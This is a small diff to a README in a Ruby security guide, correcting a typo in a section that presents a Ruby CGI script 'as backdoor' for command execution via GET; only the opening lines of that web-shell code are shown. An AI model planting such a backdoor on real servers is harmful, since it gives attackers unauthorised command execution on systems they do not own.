rubyfu/RubyFu/module_0x4__web_kungfu/README.md

 ### Web Shell[^1] - command execution via GET

-if you have a server that supports ruby CGI, you can use the follwoing as backdoor
+if you have a server that supports ruby CGI, you can use the following as backdoor
 ```ruby
 #!/usr/bin/env ruby
 require 'cgi'